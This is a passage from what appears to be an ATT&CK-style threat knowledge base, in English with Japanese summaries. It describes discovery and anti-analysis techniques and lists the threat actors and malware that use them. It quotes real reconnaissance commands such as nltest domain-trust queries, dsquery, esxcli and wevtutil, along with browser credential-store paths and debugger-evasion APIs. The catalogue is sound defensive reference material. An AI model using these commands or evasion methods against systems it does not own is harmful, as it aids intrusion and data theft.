AkaiRyū, MirrorFace exported Chrome web data including contact information, keywords, autofill data, and stored credit card information. APT38 has collected browser bookmark information to learn more about compromised hosts, obtain personal information about users, and acquire details about internal network resources. Kimsuky has collected sensitive browser data using the function `GetBrowserData()` to include login credentials, bookmarks, cookies, and encryption keys. Chimera has used <code>type \\<hostname>\c$\Users\<username>\Favorites\Links\Bookmarks bar\Imported From IE\*citrix*</code> for bookmark discovery. Fox Kitten has used Google Chrome bookmarks to identify internal resources and assets. Scattered Spider retrieves browser histories via infostealer malware such as Raccoon Stealer. Volt Typhoon has targeted the browsing history of network administrators. Moonstone Sleet deployed malware such as YouieLoader capable of capturing victim system browser information. MobileOrder has a command to upload to its C2 server victim browser bookmarks. Calisto collects information on bookmarks from Google Chrome. Empire has the ability to gather browser data such as bookmarks and visited sites. Machete retrieves the user profile data (e.g., browsers) from Chrome and Firefox browsers. Dtrack can retrieve browser history. DarkWatchman can retrieve browser history. Lizar can retrieve browser history and database files. PowerLess has a browser info stealer module that can read Chrome and Edge browser database files. SUGARDUMP has collected browser bookmark and history information. Mafalda can collect the contents of the `%USERPROFILE%\AppData\Local\Google\Chrome\User Data\LocalState` file. Mispadu can monitor browser activity for online banking actions and display full-screen overlay images to block user access to the intended site or present additional data fields. Cuckoo Stealer can collect bookmarks, cookies, and history from Safari. To collect data on the host's Wi-Fi connection history, LightSpy reads the `/Library/Preferences/SystemConfiguration/com.apple.airport.preferences.plist` file. It also utilizes Apple's `CWWiFiClient` API to scan for nearby Wi-Fi networks and obtain data on the SSID, security type, and RSSI (signal strength) values. Troll Stealer collects information from Chromium-based browsers and Firefox such as cookies, history, downloads, and extensions. Lumma Stealer has identified and gathered information from two-factor authentication extensions for multiple browsers. RedLine Stealer can collect information from browsers and browser extensions. BeaverTail has searched the victim device for browser extensions including those commonly associated with cryptocurrency wallets. GlassWorm has searched browser data for cookies, history, login databases, and cryptocurrency wallets. 敵対者は、ドメイン間の信頼関係を探索することがある。 Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments. Domain trusts provide a mechanism for a domain to allow access to resources based on the authentication procedures of another domain. Domain trusts allow the users of the trusted domain to access resources in the trusting domain. The information discovered may help the adversary conduct SID-History Injection, Pass the Ticket, and Kerberoasting. Domain trusts can be enumerated using the `DSEnumerateDomainTrusts()` Win32 API call, .NET methods, and LDAP. The Windows utility Nltest is known to be used by adversaries to enumerate domain trusts. ネットワークを分割し、横展開や影響範囲を限定する。 システムやアカウントを監査し、不正な活動を検出する。 ドメイン信頼関係の探索に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During C0015, the threat actors used the command `nltest /domain_trusts /all_trusts` to enumerate domain trusts. During the SolarWinds Compromise, APT29 used the `Get-AcceptedDomain` PowerShell cmdlet to enumerate accepted domains through an Exchange Management Shell. They also used AdFind to enumerate domains and to discover trust between federated domains. Leviathan performed Active Directory enumeration of victim environments during Leviathan Australian Intrusions. Lotus Blossom has used tools such as AdFind to make Active Directory queries. Magic Hound has used a web shell to execute `nltest /trusted_domains` to identify trust relationships. FIN8 has retrieved a list of trusted domains by using <code>nltest.exe /domain_trusts</code>. Chimera has <code>nltest /domain_trusts</code> to identify domain trust relationships. Earth Lusca has used Nltest to obtain information about domain controllers. Akira uses the built-in Nltest utility or tools such as AdFind to enumerate Active Directory trusts in victim environments. BlackByte enumerated Active Directory information and trust relationships during operations. Storm-1811 has enumerated domain accounts and access during intrusions. Storm-0501 has used Windows native utility Nltest `nltest.exe` for discovery. MirrorFace has run `nltest.exe /domain_trusts` on compromised systems to discover domain relationships. dsquery can be used to gather information on domain trusts with <code>dsquery * -filter "(objectClass=trustedDomain)" -attr *</code>. PowerSploit has modules such as <code>Get-NetDomainTrust</code> and <code>Get-NetForestTrust</code> to enumerate domain and forest trusts. TrickBot can gather information about domain trusts by utilizing Nltest. Nltest may be used to enumerate trusted domains by using commands such as <code>nltest /domain_trusts</code>. Empire has modules for enumerating domain trusts. PoshC2 has modules for enumerating domain trusts. IcedID used Nltest during initial discovery. BloodHound has the ability to map domain trusts and identify misconfigurations for potential abuse. Bazar can use Nltest tools to obtain information about the domain. AdFind can gather information about organizational units (OUs) and domain trusts from Active Directory. QakBot can run <code>nltest /domain_trusts /all_trusts</code> for domain trust discovery. Brute Ratel C4 can use LDAP queries and `nltest /domain_trusts` for domain trust discovery. Rubeus can gather information about domain trusts. BADHATCH can use `nltest.exe /domain_trusts` to discover domain trust relationships on a compromised machine. SocGholish can profile compromised systems to identify domain trust relationships. Pikabot will gather information concerning the Windows Domain the victim machine is a member of during execution. MgBot includes modules for collecting information on local domain users and permissions. DUSTTRAP can identify Active Directory information and related items. Latrodectus can run `C:\Windows\System32\cmd.exe /c nltest /domain_trusts` to discover domain trusts. LAMEHUG can gather Active Directory domain information. 敵対者は、仮想環境やサンドボックスを検知して動作を変え分析を回避することがある。 Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from Virtualization/Sandbox Evasion during automated discovery to shape follow-on behaviors. 敵対者は、システムの特徴を調べて仮想環境/サンドボックスを検知し動作を変えることがある。Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from Virtualization/Sandbox Evasion during automated discovery to shape follow-on behaviors. 敵対者は、ユーザー活動の有無を調べてサンドボックスを検知することがある。Adversaries may employ various user activity checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from Virtualization/Sandbox Evasion during automated discovery to shape follow-on behaviors. 敵対者は、時間ベースのチェックでサンドボックス分析を回避することがある。Adversaries may employ various time-based methods to detect virtualization and analysis environments, particularly those that attempt to manipulate time mechanisms to simulate longer elapses of time. This may include enumerating time-based properties, such as uptime or the system clock. 仮想化/サンドボックス回避に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During Operation Spalax, the threat actors used droppers that would run anti-analysis checks before executing malware on a compromised host. Darkhotel malware has employed just-in-time decryption of strings to evade sandbox detection. Saint Bear contains several anti-analysis and anti-virtualization checks. Contagious Interview has requested victims to disable Docker and other container environments in attempts to thwart container isolation and ensure device infection. CHOPSTICK includes runtime checks to identify an analysis environment and prevent execution on it. Some versions of CozyCar will check to ensure it is not being executed inside a virtual machine or a known malware analysis sandbox environment. If it detects that it is, it will exit. Pteranodon has the ability to use anti-detection functions to identify sandbox environments. RTM can detect if it is running within a sandbox or other virtualized analysis environment. Bisonal can check to determine if the compromised system is running on VMware. Agent Tesla has the ability to perform anti-sandboxing and anti-virtualization checks. StoneDrill has used several anti-emulation techniques to prevent automated analysis by emulators or sandboxes. Metamorfo has embedded a "vmdetect.exe" executable to identify virtual machines at the beginning of execution. IcedID has manipulated Keitaro Traffic Direction System to filter researcher and sandbox traffic. Carberp has removed various hooks before installing the trojan or bootkit to evade sandbox analysis or other analysis software. Hancitor has used a macro to check that an ActiveDocument shape object in the lure message is present. If this object is not found, the macro will exit without downloading additional payloads. Bazar can attempt to overload sandbox analysis by sending 1550 calls to <code>printf</code>. Egregor has used multiple anti-analysis and anti-sandbox techniques to prevent automated analysis by sandboxes. Gelsemium can use junk code to generate random activity to obscure malware behavior. Kevin can sleep for a time interval between C2 communication attempts. Squirrelwaffle has contained a hardcoded list of IP addresses to block that belong to sandboxes and analysis platforms. Bumblebee has the ability to perform anti-virtualization checks. Black Basta can make a random number of calls to the `kernel32.beep` function to hinder log analysis. Raspberry Robin contains real and fake second-stage payloads following initial execution, with the real payload only delivered if the malware determines it is not running in a virtualized environment. StrelaStealer payloads have used control flow obfuscation techniques such as excessively long code blocks of mathematical instructions to defeat sandboxing and related analysis methods. XLoader can utilize decoy command and control domains within the malware configuration to circumvent sandbox analysis. RedLine Stealer has an anti-sandbox technique that requires the malware to consistently check with the C2 server, if the communication fails RedLine Stealer will not continue execution. 敵対者は、インストール済みソフト（セキュリティ製品等）を探索することがある。 Adversaries may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment. Adversaries may use the information from Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. 敵対者は、インストール済みのセキュリティ製品を探索して回避戦略を練ることがある。Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as cloud monitoring agents and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. 敵対者は、バックアップソフトを探索して復旧阻害や攻撃に備えることがある。Adversaries may attempt to get a listing of backup software or configurations that are installed on a system. Adversaries may use this information to shape follow-on behaviors, such as Data Destruction, Inhibit System Recovery, or Data Encrypted for Impact. ソフトウェアの探索に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During Operation Wocao, threat actors collected a list of installed software on the infected system. During Operation Dust Storm, the threat actors deployed a file called `DeployJava.js` to fingerprint installed software on a victim system prior to exploit delivery. During Juicy Mix, OilRig used browser data dumper tools to create a list of users with Google Chrome installed. BRONZE BUTLER has used tools to enumerate software installed on an infected host. MuddyWater has used a PowerShell backdoor to check for Skype connectivity on the target machine. Tropic Trooper's backdoor could list the infected system's installed software. Inception has enumerated installed software on compromised systems. Windshift has used malware to identify installed software. Sidewinder has used tools to enumerate software installed on an infected host. Windigo has used a script to detect installed software on targeted systems. Mustang Panda has searched the victim system for the <code>InstallUtil.exe</code> program and its version. HEXANE has enumerated programs installed on an infected machine. SideCopy has collected browser information from a compromised host. Volt Typhoon has queried the Registry on compromised systems for information on installed software. Dyre has the ability to identify installed programs on a compromised host. DustySky lists all installed software for the infected machine. ComRAT can check the victim's default browser to determine which process to inject its communications module into. RTM can scan victim drives to look for specific banking software on the machine to determine next actions. The Cobalt Strike System Profiler can discover applications through the browser and identify the version of Java the target has. Orz can gather the victim's Internet Explorer version. InvisiMole can collect information about installed software used by specific users, software executed on user login, and software executed by each system. Dridex has collected a list of installed software on the system. HotCroissant can retrieve a list of applications from the <code>SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths</code> registry key. ShimRatReporter gathered a list of installed software on the infected host. Metamorfo has searched the compromised system for banking applications. TajMahal has the ability to identify the Internet Explorer (IE) version on an infected host. down_new has the ability to gather information on installed applications. Bundlore has the ability to enumerate what browser is being used as well as version information for Safari. KGH_SPY can collect information on installed applications. Bazar can query the Registry for installed applications. P.A.S. Webshell can list PHP server configuration details. Siloscape searches for the kubectl binary. SpicyOmelette can enumerate running software on a targeted system. QakBot can enumerate a list of installed programs. MarkiRAT can check for the Telegram installation directory by enumerating the files on disk. XCSSET uses <code>ps aux</code> with the <code>grep</code> command to enumerate common browsers and system processes potentially impacting XCSSET's exfiltration capabilities. CharmPower can list the installed applications on a compromised host. SUGARDUMP can identify Chrome, Opera, Edge Chromium, and Firefox browsers, including version number, on a compromised host. SVCReady can collect a list of installed software from an infected host. Woody RAT can collect .NET, PowerShell, and Python information from an infected host. Samurai can check for the presence and version of the .NET framework. SocGholish can identify the victim's browser in order to serve the correct fake update page. LunarWeb can list installed software on compromised systems. Raccoon Stealer is capable of identifying running software on victim machines. Cuckoo Stealer has the ability to search systems for installed applications. StrelaStealer variants use COM objects to enumerate installed applications from the "AppsFolder" on victim machines. If sent the command `16001`, LightSpy uses the `NSFileManger contentsOfDirectoryAtPath()` to enumerate the Applications folder to collect the bundle name, bundle identifier, and version information from each application's `info.plist` file. The results are then converted into a JSON blob for exfiltration. PUBLOAD has used several commands executed in sequence via `cmd` in a short interval to gather software versions including querying Registry keys. RedLine Stealer can get a list of programs on the victim device. InvisibleFerret has gathered installed programs and running processes. GlassWorm has searched for existing wallet applications to include Ledger Live and Trezor Suite. IronWind can list installed software on targeted hosts. 敵対者は、利用中のクラウドサービスを探索することがある。 An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Entra ID, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs. クラウドサービスの探索に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 Storm-0501 has discovered the victim environment’s protections to include Azure policies, resource locks, and Azure Storage immutability policies. AADInternals can enumerate information about a variety of cloud services, such as Office 365 and Sharepoint instances or OpenID Configurations. ROADTools can enumerate Azure AD applications and service principals. Pacu can enumerate AWS services, such as CloudTrail and CloudWatch. TruffleHog has the ability to scan code repositories and CI/CD platforms. 敵対者は、クラウドの管理ダッシュボードを悪用して情報を探索することがある。 An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information from an operational cloud environment, such as specific services, resources, and features. For example, the GCP Command Center can be used to view all assets, review findings of potential security risks, and run additional queries, such as finding public IP addresses and open ports. アカウントの作成・権限・ライフサイクルを適切に管理する。 クラウドサービスダッシュボードに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 Scattered Spider abused AWS Systems Manager Inventory to identify targets on the compromised network prior to lateral movement. 敵対者は、クラウドインフラ（インスタンス等）を探索することがある。 An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services. アカウントの作成・権限・ライフサイクルを適切に管理する。 クラウドインフラの探索に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 Scattered Spider enumerates cloud environments including Amazon Web Services (AWS) S3 buckets to identify server and backup management infrastructure, resource access, databases and storage containers . Storm-0501 has enumerated compromised cloud environments to identify critical assets, data stores, and back resources. Pacu can enumerate AWS infrastructure, such as EC2 instances. TruffleHog can enumerate AWS Infrastructure to include EC2 instances. 敵対者は、コンテナやリソースを探索することがある。 Adversaries may attempt to discover containers and other resources that are available within a containers environment. Other resources may include images, deployments, pods, nodes, and other information such as the status of a cluster. アカウントの作成・権限・ライフサイクルを適切に管理する。 ネットワークを分割し、横展開や影響範囲を限定する。 ネットワーク越しのリソースアクセスを制限する。 コンテナ/リソースの探索に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 TeamTNT has checked for running containers with <code>docker ps</code> and for specific container names with <code>docker inspect</code>. TeamTNT has also searched for Kubernetes pods running in a local network. Hildegard has used masscan to search for kubelets and the kubelet API for additional running containers. Peirates can enumerate Kubernetes pods in a given namespace. 敵対者は、システムの地理的所在地を探索することがある。 Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from System Location Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. 敵対者は、システムの言語設定を調べて所在地や標的適合性を判断することがある。Adversaries may attempt to gather information about the system language of a victim in order to infer the geographical location of that host. This information may be used to shape follow-on behaviors, including whether the adversary infects the target and/or attempts specific actions. This decision may be employed by malware developers and operators to reduce their risk of attracting the attention of specific law enforcement agencies or prosecution/scrutiny from other entities. システム所在地の探索に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 SideCopy has identified the country location of a compromised host. Volt Typhoon has obtained the victim's system current location. PlugX has obtained the location of the victim device by leveraging `GetSystemDefaultLCID`. Crimson can identify the geographical location of a victim host. QuasarRAT can determine the country a victim host is located in. Remcos can identify the location of targeted devices. SDBbot can collected the country code of a compromised machine. Before executing malicious code, Ragnar Locker checks the Windows API <code>GetLocaleInfoW</code> and doesn't encrypt files if it finds a former Soviet country. GrimAgent can identify the country code on a compromised host. DarkWatchman can identity the OS locale of a compromised host. Saint Bot has conducted system locale checks to see if the compromised host is in Russia, Ukraine, Belarus, Armenia, Kazakhstan, or Moldova. Amadey does not run any tasks or install additional malware if the victim machine is based in Russia. DarkGate queries system locale information during execution. Later versions of DarkGate query <code>GetSystemDefaultLCID</code> for locale information to determine if the malware is executing in Russian-speaking countries. SocGholish can use IP-based geolocation to limit infections to victims in North America, Europe, and a small number of Asian-Pacific nations. Gootloader can use IP geolocation to determine if the person browsing to a compromised site is within a targeted territory such as the US, Canada, Germany, and South Korea. Raccoon Stealer collects the `Locale Name` of the infected device via `GetUserDefaultLocaleName` to determine whether the string `ru` is included, but in analyzed samples no action is taken if present. Cuckoo Stealer can determine the geographical location of a victim host by checking the language. RedLine Stealer has gathered detailed information about victims’ systems, such as IP addresses, and geolocation. RedLine Stealer has also checked the IP from where it was being executed and leveraged an opensource geolocation IP-lookup service. InvisibleFerret has collected the internal IP address, IP geolocation information of the infected host and sends the data to a C2 server. InvisibleFerret has also leveraged the “pay” module to obtain region name, country, city, zip code, ISP, latitude and longitude using “http://ip-api.com/json”. XORIndex Loader can identify the geographical location of a victim host. HexEval Loader has a function where the C2 endpoint can identify the geographical location of a victim host based on request headers, execution environment and runtime conditions. GlassWorm has leveraged geofencing logic to detect whether it is operating in a Russian associated time zone to determine whether it continues to execute. PureCrypter can use `kernel32!GetGeoInfo` to determine system location. SameCoin can attempt to connect to the Israel Home Front Command site, oref.org[.]il, which is only reachable from within Israel to verify the target's location. AshTag can check geolocation on targeted systems. Tsundere Botnet has checked the victim machine’s location by obtaining the culture name of the machine. 敵対者は、グループポリシーを探索して環境を把握することがある。 Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predictable network path `\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\`. グループポリシーの探索に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 Leviathan performed extensive Active Directory enumeration of victim environments during Leviathan Australian Intrusions. Turla surveys a system upon check-in to discover Group Policy details using the <code>gpresult</code> command. Emissary has the capability to execute <code>gpresult</code>. Empire includes various modules for enumerating Group Policy. BloodHound has the ability to collect local admin information via GPO. LunarWeb can capture information on group policy settings DUSTTRAP can identify victim environment Group Policy information. 敵対者は、クラウドストレージのオブジェクトを列挙することがある。 Adversaries may enumerate objects in cloud storage infrastructure. Adversaries may use this information during automated discovery to shape follow-on behaviors, including requesting all or specific objects from cloud storage. Similar to File and Directory Discovery on a local host, after identifying available storage services (i.e. Cloud Infrastructure Discovery) adversaries may access the contents/objects stored in cloud infrastructure. アカウントの作成・権限・ライフサイクルを適切に管理する。 クラウドストレージオブジェクトの探索に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 Peirates can list AWS S3 buckets. Pacu can enumerate AWS storage services, such as S3 buckets and Elastic Block Store volumes. TruffleHog can enumerate cloud storage environments including Amazon Web Service (AWS) S3 buckets and Google Cloud Storage buckets. 敵対者は、デバッガの存在を検知して動作を変え分析を回避することがある。 Adversaries may employ various means to detect and avoid debuggers. Debuggers are typically used by defenders to trace and/or analyze the execution of potential malware payloads. デバッガ回避に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During Operation Dream Job, Lazarus Group used tools that used the `IsDebuggerPresent` call to detect debuggers. Mustang Panda has embedded debug strings with messages to distract analysts. Mustang Panda has also made calls to Windows API `CheckRemoteDebuggerPresent` and exits if it detects a debugger. PlugX has made calls to Windows API `CheckRemoteDebuggerPresent` and exits if it detects a debugger. ROKRAT can check for debugging tools. ThiefQuest uses a function named <code>is_debugging</code> to perform anti-debugging logic. The function invokes <code>sysctl</code> checking the returned value of <code>P_TRACED</code>. ThiefQuest also calls <code>ptrace</code> with the <code>PTRACE_DENY_ATTACH</code> flag to prevent debugging. DRATzarus can use `IsDebuggerPresent` to detect whether a debugger is present on a victim. Saint Bot has used `is_debugger_present` as part of its environmental checks. Bumblebee can search for tools used in static analysis. Mafalda can search for debugging tools on a compromised host. DarkTortilla can detect debuggers by using functions such as `DebuggerIsAttached` and `DebuggerIsLogging`. DarkTortilla can also detect profilers by verifying the `COR_ENABLE_PROFILING` environment variable is present and active. The Black Basta dropper can check system flags, CPU registers, CPU instructions, process timing, system libraries, and APIs to determine if a debugger is present. AsyncRAT can use the `CheckRemoteDebuggerPresent` function to detect the presence of a debugger. DarkGate checks the <code>BeingDebugged</code> flag in the PEB structure during execution to identify if the malware is being debugged. Raspberry Robin leverages anti-debugging mechanisms through the use of <code>ThreadHideFromDebugger</code>. Pikabot features several methods to evade debugging by analysts, including checks for active debuggers, the use of breakpoints during execution, and checking various system information items such as system memory and the number of processors. Latrodectus has the ability to check for the presence of debuggers. StrelaStealer variants include functionality to identify and evade debuggers. StealBit can detect it is being run in the context of a debugger. LockBit 3.0 can check heap memory parameters for indications of a debugger and stop the flow of events to the attached debugger in order to hinder dynamic analysis. XLoader uses anti-debugging mechanisms such as calling `NtQueryInformationProcess` with `InfoClass=7`, referencing `ProcessDebugPort`, to determine if it is being analyzed. Lumma Stealer has checked for debugger strings by invoking `GetForegroundWindow` and looks for strings containing “x32dbg”, “x64dbg”, “windbg”, “ollydbg”, “dnspy”, “immunity debugger”, “hyperdbg”, “debug”, “debugger”, “cheat engine”, “cheatengine” and “ida”. PUBLOAD has embedded debug strings with messages to distract analysts. PUBLOAD has leveraged `OutputDebugStringW` and `OutputDebugStringA` functions. TONESHELL has leveraged custom exception handlers to hide code flow and stop execution of a debugger. PureCrypter has the ability to call `CheckRemoteDebuggerPresent`. ANELLDR can call `ZwSetInformationThread` with the second argument set to `ThreadHideFromDebugger (0x11)` to evade being debugged. RustyWater has registered a Vectored Exception Handler (VEH) to catch debugging efforts. 敵対者は、インストール済みデバイスドライバを探索することがある。 Adversaries may attempt to enumerate local device drivers on a victim host. Information about device drivers may highlight various insights that shape follow-on behaviors, such as the function/purpose of the host, present security tools (i.e. Security Software Discovery) or other defenses (e.g., Virtualization/Sandbox Evasion), as well as potential exploitable vulnerabilities (e.g., Exploitation for Privilege Escalation). デバイスドライバの探索に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 Medusa Group has queried drivers on the victim device through the command `driverquery`. Remsec has a plugin to detect active drivers of some security products. HOPLIGHT can enumerate device drivers located in the registry at `HKLM\Software\WBEM\WDM`. INC Ransomware can verify the presence of specific drivers on compromised hosts including Microsoft Print to PDF and Microsoft XPS Document Writer. 敵対者は、ログを列挙して情報を収集することがある。 Adversaries may enumerate system and service logs to find useful data. These logs may highlight various types of valuable insights for an adversary, such as user authentication records (Account Discovery), security or vulnerable software (Software Discovery), or hosts within a compromised network (Remote System Discovery). アカウントの作成・権限・ライフサイクルを適切に管理する。 ログの列挙に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 Mustang Panda has used Wevtutil to gather Windows Security Event Logs. Aquatic Panda enumerated logs related to authentication in Linux environments prior to deleting selective entries for defense evasion purposes. Ember Bear has enumerated SECURITY and SYSTEM log files during intrusions. Volt Typhoon has used `wevtutil.exe` and the PowerShell command `Get-EventLog security` to enumerate Windows logs to search for successful logons. APT5 has used the BLOODMINE utility to parse and extract information from Pulse Secure Connect logs. Pacu can collect CloudTrail event histories and CloudWatch logs. DUSTTRAP can identify infected system log information. Megazord has the ability to print the trace, debug, error, info, and warning logs. Akira _v2 can enumerate the trace, debug, error, info, and warning logs on targeted systems. BeaverTail has identified .ldb and .log files stored in browser extension directories for collection and exfiltration. 敵対者は、仮想マシンを探索して環境を把握することがある。 An adversary may attempt to enumerate running virtual machines (VMs) after gaining access to a host or hypervisor. For example, adversaries may enumerate a list of VMs on an ESXi hypervisor using a Hypervisor CLI such as `esxcli` or `vim-cmd` (e.g. `esxcli vm process list or vim-cmd vmsvc/getallvms`). Adversaries may also directly leverage a graphical user interface, such as VMware vCenter, in order to view virtual machines on a host. 仮想マシンの探索に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 UNC3886 has used scripts to enumerate ESXi hypervisors and their guest VMs. Cheerscrypt has leveraged `esxcli vm process list` in order to gather a list of running virtual machines to terminate them. VIRTUALPITA can target specific guest virtual machines for script execution. Qilin can detect virtual machine environments including ESXi hosts, datacenters, and clusters within vCenter environments. PureCrypter can identify virtual machines by querying the WMI object Win32_ComputerSystem for manufacturer and model and check it against the regular expression Microsoft|VMWare|Virtual. 敵対者は、ローカルストレージを探索して情報を収集することがある。 Adversaries may enumerate local drives, disks, and/or volumes and their attributes like total or free space and volume serial number. This can be done to prepare for ransomware-related encryption, to perform Lateral Movement, or as a precursor to Direct Volume Access. ローカルストレージの探索に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During Operation Wocao, threat actors discovered the local disks attached to the system and their hardware information including manufacturer and model. During C0017, APT41 issued `ping -n 1 ((cmd /c dir c:\|findstr Number).split()[-1]+` commands to find the volume serial number of compromised systems. During the SolarWinds Compromise, APT29 used `fsutil` to check available free space before executing actions that might create large files on disk. A Destover-like variant used by Lazarus Group collects disk space information and sends it to its C2 server. Patchwork enumerated all available drives on the victim's machine. Tropic Trooper has detected a target system’s system volume information. Kimsuky has enumerated drives. Chimera has used `fsutil fsinfo drives`, `systeminfo`, and `vssadmin list shadows` for system information including shadow volumes and drive information. Higaisa collected the system volume serial number. TeamTNT has searched for disk partition and logical volume information. Confucius has used a file stealer that can examine system drives, including those other than the C drive. Volt Typhoon has discovered file system types, drive names, size, and free space on compromised systems. ToddyCat has collected information on bootable drives including model, vendor, and serial numbers. PlugX has collected a list of all mapped drives on the infected host. JHUHUGIT obtains a build identifier as well as victim hard drive information from Windows registry key <code>HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum</code>. Another JHUHUGIT variant gathers the victim storage volume serial number and the storage device name. Epic collects disk space information. Crimson contains a command to collect disk drive information. CORESHELL collects the volume serial number from the victim and sends the information to its C2 server. Reaver collects volume serial number from the victim. FALLCHILL can collect information about installed disks from the victim. Pasam creates a backdoor through which remote attackers can retrieve information like free disk space. Bandook can collect information about the drives available on the system. Proxysvc collects volume information for all drives on the system. Bankshot gathers disk type and disk free space. yty gathers the the serial number of the main disk volume. Zebrocy collects the serial number for the storage volume C:\. RunningRAT gathers logical drives information and volume information. InnaputRAT gathers volume drive information. InvisiMole can gather information on the mapped drives and system volume serial number. TYPEFRAME can gather the disk volume information. Kazuar gathers information on local drives. FELIXROOT collects the victim’s volume serial number. KEYMARBLE has the capability to collect information on disk devices. Octopus can collect system drive and disk size information. Cannon can gather drive information from the victim's machine. NOKKI can gather information on drives on the victim’s machine. KONNI can gather information on connected drives and disk space from the victim’s machine. HOPLIGHT has been observed collecting victim machine volume information. Attor monitors the free disk space on the system. Ryuk has called <code>GetLogicalDrives</code> to emumerate all mounted drives, and <code>GetDriveTypeW</code> to determine the drive type. Rising Sun can detect drive information, including drive type, total number of bytes on disk, total number of free bytes on disk, and name of a specified volume. Aria-body has the ability to identify disk information on a compromised host. Ramsay can detect system information--including disk names, total space, and remaining space--to create a hardware profile GUID which acts as a system identifier for operators. build_downer has the ability to send system volume information to C2. down_new has the ability to identify the system volume information of a compromised host. Avenger has the ability to identify the host volume ID. CrackMapExec can enumerate the system drives and associated system name. StrongPity can identify the hard disk volume serial number on a compromised host. REvil can identify system drive information on a compromised host. SoreFang can collect disk space information on victim machines by executing Systeminfo. BLINDINGCAN has collected disk information, including type and free space available. KGH_SPY can collect drive information from a compromised host. SLOTHFULMEDIA has collected disk information from a victim machine. BlackMould can enumerate local drives on a compromised host. TAINTEDSCRIBE can use <code>DriveList</code> to retrieve drive information. Penquin can report the disk space of a compromised host to C2. ShadowPad has discovered system information including volume serial numbers. KillDisk retrieves the hard disk name by calling the <code>CreateFileA to \\.\PHYSICALDRIVE0</code> API. DEATHRANSOM can enumerate logical drives on a target system. HELLOKITTY can enumerate logical drives on a target system. Cuba can enumerate local drives, disk type, and disk free space. Nebulae can discover logical drive information including the drive type, free space, and volume information. Babuk can enumerate disk volumes, get disk information, and query service status. SysUpdate can collect a system's drive information. Chrommme has the ability to list drives. Zox can enumerate attached drives. Torisma can use `GetlogicalDrives` to get a bitmask of all drives available on a compromised system. It can also use `GetDriveType` to determine if a new drive is a CD-ROM drive. LitePower has the 